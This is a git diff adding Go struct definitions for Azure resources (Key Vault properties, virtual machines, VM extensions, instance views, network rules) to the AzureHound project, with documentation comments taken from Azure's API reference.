b/models/azure/vault_certificate.go @@ -0,0 +1,44 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a single certificate reference in a Key Vault, and where the certificate should reside on the VM. +type VaultCertificate struct { + // For Windows VMs, specifies the certificate store on the Virtual Machine to which the certificate should be added. + // The specified certificate store is implicitly in the LocalMachine account. + // For Linux VMs, the certificate file is placed under the /var/lib/waagent directory, with the file name + // .crt for the X509 certificate file and .prv for private key. + // Both of these files are .pem formatted. + CertificateStore string `json:"certificateStore,omitempty"` + + // This is the URL of a certificate that has been uploaded to Key Vault as a secret. + // For adding a secret to the Key Vault, see Add a key or secret to the key vault. In this case, your certificate + // needs to be It is the Base64 encoding of the following JSON Object which is encoded in UTF-8: + // + // ```json + // { + // "data":"", + // "dataType":"pfx", + // "password":"" + // } + // ``` + // + // To install certificates on a virtual machine it is recommended to use the Azure Key Vault virtual machine + // extension for Linux or the Azure Key Vault virtual machine extension for Windows. + CertificateUrl string `json:"certificateUrl,omitempty"` +} diff --git a/models/azure/vault_props.go b/models/azure/vault_props.go new file mode 100644 index 0000000..d944473 --- /dev/null +++ b/models/azure/vault_props.go @@ -0,0 +1,87 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Properties of the vault +type VaultProperties struct { + // An array of 0 to 1024 identities that have access to the key vault. All identities in the array must use the same + // tenant ID as the key vault's tenant ID. When createMode is set to recover, access policies are not required. + // Otherwise, access policies are required. + AccessPolicies []AccessPolicyEntry `json:"accessPolicies,omitempty"` + + // The vault's create mode to indicate whether the vault need to be recovered or not. + CreateMode enums.CreateMode `json:"createMode,omitempty"` + + // Property specifying whether protection against purge is enabled for this vault. + // Setting this property to true activates protection against purge for this vault and its content - only the + // Key Vault service may initiate a hard, irrecoverable deletion. + // The setting is effective only if soft delete is also enabled. + // Enabling this functionality is irreversible - that is, the property does not accept false as its value. + EnablePurgeProtection bool `json:"enablePurgeProtection,omitempty"` + + // Property that controls how data actions are authorized. + // When true, the key vault will use Role Based Access Control (RBAC) for authorization of data actions, and the + // access policies specified in vault properties will be ignored. When false, the key vault will use the access + // policies specified in vault properties, and any policy stored on Azure Resource Manager will be ignored. If null + // or not specified, the vault is created with the default value of false. + // Note that management actions are always authorized with RBAC. + EnableRbacAuthorization bool `json:"enableRbacAuthorization,omitempty"` + + // Property to specify whether the 'soft delete' functionality is enabled for this key vault. + // If it's not set to any value(true or false) when creating new key vault, it will be set to true by default. + // Once set to true, it cannot be reverted to false. + EnableSoftDelete bool `json:"enableSoftDelete,omitempty"` + + // Property to specify whether Azure Virtual Machines are permitted to retrieve certificates stored as secrets from + // the key vault. + EnabledForDeployment bool `json:"enabledForDeployment,omitempty"` + + // Property to specify whether Azure Disk Encryption is permitted to retrieve secrets from the vault and unwrap keys. + EnabledForDiskEncryption bool `json:"enabledForDiskEncryption,omitempty"` + + // Property to specify whether Azure Resource Manager is permitted to retrieve secrets from the key vault. + EnabledForTemplateDeployment bool `json:"enabledForTemplateDeployment,omitempty"` + + // The resource ID of HSM Pool. + HsmPoolResourceId string `json:"hsmPoolResourceId,omitempty"` + + // Rules governing the accessibility of the key vault from specific network locations. + NetworkAcls NetworkRuleSet `json:"networkAcls,omitempty"` + + // List of private endpoint connections associated with the key vault. + PrivateEndpointConnections []PrivateEndpointConnectionItem `json:"privateEndpointConnections,omitempty"` + + // Provisioning state of the vault. + ProvisioningState enums.VaultProvisioningState `json:"provisioningState,omitempty"` + + // SKU details + Sku Sku `json:"sku,omitempty"` + + // softDelete data retention days. It accepts >=7 and <=90. + SoftDeleteRetentionInDays int `json:"softDeleteRetentionInDays,omitempty"` + + // The Azure Active Directory tenant ID that should be used for authenticating requests to the key vault. + TenantId string `json:"tenantId,omitempty"` + + // The URI of the vault for performing operations on keys and secrets. This property is readonly. + VaultUri string `json:"vaultUri,omitempty"` +} diff --git a/models/azure/vault_secret_group.go b/models/azure/vault_secret_group.go new file mode 100644 index 0000000..77c3e97 --- /dev/null +++ b/models/azure/vault_secret_group.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a set of certificates which are all in the same Key Vault. +type VaultSecretGroup struct { + // The relative URL of the Key Vault containing all of the certificates in VaultCertificates. + SourceVault SubResource `json:"sourceVault,omitempty"` + + // The list of key vault references in SourceVault which contain certificates. + VaultCertificates []VaultCertificate `json:"vaultCertificates,omitempty"` +} diff --git a/models/azure/verified_domain.go b/models/azure/verified_domain.go new file mode 100644 index 0000000..6e18adf --- /dev/null +++ b/models/azure/verified_domain.go @@ -0,0 +1,36 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies a domain for a tenant. +type VerifiedDomain struct { + // For example, "Email", "OfficeCommunicationsOnline". + Capabilities string `json:"capabilities,omitempty"` + + // `true` if this is the default domain associated with the tenant; otherwise, `false`. + IsDefault bool `json:"isDefault,omitempty"` + + // `true` if this is the initial domain associated with the tenant; otherwise, `false`. + IsInitial bool `json:"isInitial,omitempty"` + + // The domain name; for example, “contoso.onmicrosoft.com”. + Name string `json:"name,omitempty"` + + // For example, "Managed". + Type string `json:"type,omitempty"` +} diff --git a/models/azure/verified_publisher.go b/models/azure/verified_publisher.go new file mode 100644 index 0000000..c8369a9 --- /dev/null +++ b/models/azure/verified_publisher.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Represents the verified publisher of the application. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/verifiedpublisher?view=graph-rest-1.0 +type VerifiedPublisher struct { + // The verified publisher name from the app publisher's Partner Center account. + DisplayName string `json:"displayName,omitempty"` + + // The ID of the verified publisher from the app publisher's Partner Center account. + VerifiedPublisherId string `json:"verifiedPublisherId,omitempty"` + + // The timestamp when the verified publisher was first added or most recently updated. + AddedDateTime string `json:"addedDateTime,omitempty"` +} diff --git a/models/azure/virtual_application.go b/models/azure/virtual_application.go new file mode 100644 index 0000000..12d41cd --- /dev/null +++ b/models/azure/virtual_application.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type VirtualApplication struct { + PhysicalPath string `json:"physicalPath,omitempty"` + PreloadEnabled bool `json:"preloadEnabled,omitempty"` + VirtualDirectories []VirtualDirectory `json:"virtualDirectories,omitempty"` + VirtualPath string `json:"virtualPath,omitempty"` +} + +type VirtualDirectory struct { + PhysicalPath string `json:"physicalPath,omitempty"` + VirtualPath string `json:"virtualPath,omitempty"` +} diff --git a/models/azure/virtual_hard_disk.go b/models/azure/virtual_hard_disk.go new file mode 100644 index 0000000..ed9c205 --- /dev/null +++ b/models/azure/virtual_hard_disk.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes the uri of a disk. +type VirtualHardDisk struct { + Uri string `json:"uri,omitempty"` +} diff --git a/models/azure/virtual_machine.go b/models/azure/virtual_machine.go new file mode 100644 index 0000000..64cbb48 --- /dev/null +++ b/models/azure/virtual_machine.go @@ -0,0 +1,53 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +type VirtualMachine struct { + Entity + + ExtendedLocation ExtendedLocation `json:"extendedLocation,omitempty"` + Identity ManagedIdentity `json:"identity,omitempty"` + Location string `json:"location,omitempty"` + Name string `json:"name,omitempty"` + Plan Plan `json:"plan,omitempty"` + Properties VirtualMachineProperties `json:"properties,omitempty"` + Resources []VirtualMachineExtension `json:"resources,omitempty"` + Tags map[string]string `json:"tags,omitempty"` + Type string `json:"type,omitempty"` + Zones []string `json:"zones,omitempty"` +} + +func (s VirtualMachine) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s VirtualMachine) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/virtual_machine_agent_instance_view.go b/models/azure/virtual_machine_agent_instance_view.go new file mode 100644 index 0000000..939cd8e --- /dev/null +++ b/models/azure/virtual_machine_agent_instance_view.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The instance view of the the VM Agent running on the virtual machine. +type VirtualMachineAgentInstanceView struct { + // The virtual machine extension handler instance view. + ExtensionHandlers []VirtualMachineExtensionHandlerInstanceView `json:"extensionHandlers,omitempty"` + + // The resource status information. + Statuses []InstanceViewStatus `json:"statuses,omitempty"` + + // The VM Agent full version. + VMAgentVersion string `json:"vmAgentVersion,omitempty"` +} diff --git a/models/azure/virtual_machine_extension.go b/models/azure/virtual_machine_extension.go new file mode 100644 index 0000000..be223d7 --- /dev/null +++ b/models/azure/virtual_machine_extension.go @@ -0,0 +1,38 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a Virtual Machine Extension. +type VirtualMachineExtension struct { + // Resource ID. + Id string `json:"id,omitempty"` + + // Resource location. + Location string `json:"location,omitempty"` + + // Resource name. + Name string `json:"name,omitempty"` + + Properties VMExtensionProperties `json:"properties,omitempty"` + + // Resource tags. + Tags map[string]string `json:"tags,omitempty"` + + // Resource type. + Type string `json:"type,omitempty"` +} diff --git a/models/azure/virtual_machine_extension_handler_instance_view.go b/models/azure/virtual_machine_extension_handler_instance_view.go new file mode 100644 index 0000000..9dbe4fc --- /dev/null +++ b/models/azure/virtual_machine_extension_handler_instance_view.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The instance view of a virtual machine extension handler. +type VirtualMachineExtensionHandlerInstanceView struct { + // The extension handler status. + Status InstanceViewStatus `json:"status,omitempty"` + + // Specifies the type of the extension; an example is "CustomScriptExtension". + Type string `json:"type,omitempty"` + + // Specifies the version of the script handler. + TypeHandlerVersion string `json:"typeHandlerVersion,omitempty"` +} diff --git a/models/azure/virtual_machine_extension_instance_view.go b/models/azure/virtual_machine_extension_instance_view.go new file mode 100644 index 0000000..ce5bf18 --- /dev/null +++ b/models/azure/virtual_machine_extension_instance_view.go @@ -0,0 +1,36 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The instance view of a virtual machine extension. +type VirtualMachineExtensionInstanceView struct { + // The virtual machine extension name. + Name string `json:"name,omitempty"` + + // The resource status information. + Statuses []InstanceViewStatus `json:"statuses,omitempty"` + + // The resource status information. + Substatuses []InstanceViewStatus `json:"substatuses,omitempty"` + + // Specifies the type of the extension; e.g. "CustomScriptExtension" + Type string `json:"type,omitempty"` + + // Specifies the version of the script handler. + TypeHandlerVersion string `json:"typeHandlerVersion,omitempty"` +} diff --git a/models/azure/virtual_machine_health_status.go b/models/azure/virtual_machine_health_status.go new file mode 100644 index 0000000..2bb8233 --- /dev/null +++ b/models/azure/virtual_machine_health_status.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The health status of the VM. +type VirtualMachineHealthStatus struct { + // The health status information for the VM. + Status InstanceViewStatus `json:"status,omitempty"` +} diff --git a/models/azure/virtual_machine_instance_view.go b/models/azure/virtual_machine_instance_view.go new file mode 100644 index 0000000..f0c9b36 --- /dev/null +++ b/models/azure/virtual_machine_instance_view.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +// The instance view of a virtual machine. +type VirtualMachineInstanceView struct { + // Resource id of the dedicated host, on which the virtual machine is allocated through automatic placement, when + // the virtual machine is associated with a dedicated host group that has automatic placement enabled. + // Minimum api-version: 2020-06-01. + AssignedHost string `json:"assignedHost,omitempty"` + + // Boot Diagnostics is a debugging feature which allows you to view Console Output and Screenshot to diagnose VM + // status. + // You can easily view the output of your console log. + // Azure also enables you to see a screenshot of the VM from the hypervisor. + BootDiagnotics BootDiagnoticsInstanceView `json:"bootDiagnotics,omitempty"` + + // The computer name assigned to the virtual machine. + ComputerName string `json:"computerName,omitempty"` + + // The virtual machine disk information. + Disks []DiskInstanceView `json:"disks,omitempty"` + + // The extensions information. + Extensions []VirtualMachineExtensionInstanceView `json:"extensions,omitempty"` + + // Specifies the HyperVGeneration Type associated with a resource. + HyperVGeneration enums.HyperVGeneration `json:"hyperVGeneration,omitempty"` + + // The Maintenance Operation status on the virtual machine. + MaintenanceRedeployStatus MaintenanceRedeployStatus `json:"maintenanceRedeployStatus,omitempty"` + + // The Operating System running on the virtual machine. + OSName string `json:"osName,omitempty"` + + // The version of Operating System running on the virtual machine. + OSVersion string `json:"osVersion,omitempty"` + + // [Preview Feature] The status of the virtual machine patch operations. + PatchStatus VirtualMachinePatchStatus `json:"patchStatus,omitempty"` + + // Specifies the fault domain of the virtual machine. + PlatformFaultDomain int `json:"platformFaultDomain,omitempty"` + + // Specifies the update domain of the virtual machine. + PlatformUpdateDomain int `json:"platformUpdateDomain,omitempty"` + + // The remote desktop certificate thumbprint. + RDPThumbPrint string `json:"rdpThumbPrint,omitempty"` + + // The resource status information. + Statuses []InstanceViewStatus `json:"statuses,omitempty"` + + // The VM Agent running on the virtual machine. + VMAgent VirtualMachineAgentInstanceView `json:"vmAgent,omitempty"` + + // The health status for the VM. + VMHealth VirtualMachineHealthStatus `json:"vmHealth,omitempty"` +} diff --git a/models/azure/virtual_machine_network_interface_config.go b/models/azure/virtual_machine_network_interface_config.go new file mode 100644 index 0000000..64a61e7 --- /dev/null +++ b/models/azure/virtual_machine_network_interface_config.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a virtual machine network interface configuration. +type VirtualMachineNetworkInterfaceConfiguration struct { + // The network interface configuration name. + Name string `json:"name,omitempty"` + + Properties VMNetworkInterfaceConfigurationProperties `json:"properties,omitempty"` +} diff --git a/models/azure/virtual_machine_patch_status.go b/models/azure/virtual_machine_patch_status.go new file mode 100644 index 0000000..800b32a --- /dev/null +++ b/models/azure/virtual_machine_patch_status.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The status ov virtual machine patch operations. +type VirtualMachinePatchStatus struct { + // The available patch summary of the latest assessment operation for the virtual machine. + AvailablePatchSummary AvailablePatchSummary `json:"availablePatchSummary,omitempty"` + + // The enablement status of the specified patchMode. + ConfigurationStatuses []InstanceViewStatus `json:"configurationStatuses,omitempty"` + + // The installation summary of the latest installation operation for the virtual machine. + LastPatchInstallationSummary LastPatchInstallationSummary `json:"lastPatchInstallationSummary,omitempty"` +} diff --git a/models/azure/virtual_machine_props.go b/models/azure/virtual_machine_props.go new file mode 100644 index 0000000..7fe25f0 --- /dev/null +++ b/models/azure/virtual_machine_props.go @@ -0,0 +1,50 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +type VirtualMachineProperties struct { + AdditionalCapabilities AdditionalCapabilities `json:"additionalCapabilities,omitempty"` + ApplicationProfile ApplicationProfile `json:"applicationProfile,omitempty"` + AvailabilitySet SubResource `json:"availabilitySet,omitempty"` + BillingProfile BillingProfile `json:"billingProfile,omitempty"` + CapacityReservation CapacityReservationProfile `json:"capacityReservation,omitempty"` + DiagnosticsProfile DiagnosticsProfile `json:"diagnosticsProfile,omitempty"` + EvictionPolicy enums.VMEvictionPolicy `json:"evictionPolicy,omitempty"` + ExtensionsTimeBudget string `json:"extensionsTimeBudget,omitempty"` + HardwareProfile HardwareProfile `json:"hardwareProfile,omitempty"` + Host SubResource `json:"host,omitempty"` + HostGroup SubResource `json:"hostGroup,omitempty"` + InstanceView VirtualMachineInstanceView `json:"instanceView,omitempty"` + LicenseType string `json:"licenseType,omitempty"` + NetworkProfile NetworkProfile `json:"networkProfile,omitempty"` + OSProfile OSProfile `json:"osProfile,omitempty"` + PlatformFaultDomain int `json:"platformFaultDomain,omitempty"` + Priority enums.VMPriority `json:"priority,omitempty"` + ProvisioningState string `json:"provisioningState,omitempty"` + ProximityPlacementGroup SubResource `json:"proximityPlacementGroup,omitempty"` + ScheduledEventsProfile ScheduledEventsProfile `json:"scheduledEventsProfile,omitempty"` + SecurityProfile SecurityProfile `json:"securityProfile,omitempty"` + StorageProfile StorageProfile `json:"storageProfile,omitempty"` + UserData string `json:"userData,omitempty"` + VirtualMachineScaleSet SubResource `json:"virtualMachineScaleSet,omitempty"` + VMId string `json:"vmId,omitempty"` +} diff --git a/models/azure/virtual_network_rule.go b/models/azure/virtual_network_rule.go new file mode 100644 index 0000000..80ee922 --- /dev/null +++ b/models/azure/virtual_network_rule.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// A rule governing the accessibility of a vault from a specific virtual network. +type VirtualNetworkRule struct { + // Full resource id of a vnet subnet, such as + // '/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/test-vnet/subnets/subnet1'. + Id string `json:"id,omitempty"` + + // Property to specify whether NRP will ignore the check if parent subnet has serviceEndpoints configured. + IgnoreMissingVnetServiceEndpoint bool `json:"ignoreMissingVnetServiceEndpoint,omitempty"` +} diff --git a/models/azure/vm_extension_props.go b/models/azure/vm_extension_props.go new file mode 100644 index 0000000..1fdcb3b --- /dev/null +++ b/models/azure/vm_extension_props.go @@ -0,0 +1,59 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type VMExtensionProperties struct { + // Indicates whether the extension should use a newer minor version if one is available at deployment time. + // Once deployed, however, the extension will not upgrade minor versions unless redeployed, even with this property + // set to true. + AutoUpgradeMinorVersion bool `json:"autoUpgradeMinorVersion,omitempty"` + + // Indicates whether the extension should be automatically upgraded by the platform if there is a newer version of + // the extension available. + EnabledAutomaticUpgrade bool `json:"enabledAutomaticUpgrade,omitempty"` + + // How the extension handler should be forced to update even if the extension configuration has not changed. + ForceUpdateTag string `json:"forceUpdateTag,omitempty"` + + // The virtual machine extension instance view. + InstanceView VirtualMachineExtensionInstanceView `json:"instanceView,omitempty"` + + // The extension can contain either protectedSettings or protectedSettingsFromKeyVault or no protected settings at + // all. + ProtectedSettings map[string]string `json:"protectedSettings,omitempty"` + + // The provisioning state, which only appears in the response. + ProvisioningState string `json:"provisioningState,omitempty"` + + // The name of the extension handler publisher. + Publisher string `json:"publisher,omitempty"` + + // Json formatted public settings for the extension. + Settings map[string]string `json:"settings,omitempty"` + + // Indicates whether failures stemming from the extension will be suppressed (Operational failures such as not + // connecting to the VM will not be suppressed regardless of this value). + // The default is false. + SuppressFailures bool `json:"suppressFailures,omitempty"` + + // Specifies the type of the extension; an example is "CustomScriptExtension". + Type string `json:"type,omitempty"` + + // Specifies the version of the script handler. + TypeHandlerVersion string `json:"typeHandlerVersion,omitempty"` +} diff --git a/models/azure/vm_gallery_app.go b/models/azure/vm_gallery_app.go new file mode 100644 index 0000000..40838fd --- /dev/null +++ b/models/azure/vm_gallery_app.go @@ -0,0 +1,35 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the required information to reference a compute gallery application version. +type VMGalleryApplication struct { + // Optional, Specifies the uri to an azure blob that will replace the default configuration for the package if + // provided. + ConfigurationReference string `json:"configurationReference,omitempty"` + + // Optional, Specifies the order in which the packages have to be installed. + Order int `json:"order,omitempty"` + + // Specifies the GalleryApplicationVersion resource id on the form of + // /subscriptions/{SubscriptionId}/resourceGroups/{ResourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{application}/versions/{version} + PackageReferenceId string `json:"packageReferenceId,omitempty"` + + // Optional, Specifies a passthrough value for more generic context. + Tags string `json:"tags,omitempty"` +} diff --git a/models/azure/vm_ip_config_props.go b/models/azure/vm_ip_config_props.go new file mode 100644 index 0000000..8b1751d --- /dev/null +++ b/models/azure/vm_ip_config_props.go @@ -0,0 +1,46 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type VMIPConfigProperties struct { + // Specifies an array of references to backend address pools of application gateways. A virtual machine can + // reference backend address pools of multiple application gateways. Multiple virtual machines cannot use the same + // application gateway. + ApplicationGatewayBackendAddressPools []SubResource `json:"applicationGatewayBackendAddressPools,omitempty"` + + // Specifies an array of references to application security group. + ApplicationSecurityGroups []SubResource `json:"applicationSecurityGroups,omitempty"` + + // Specifies an array of references 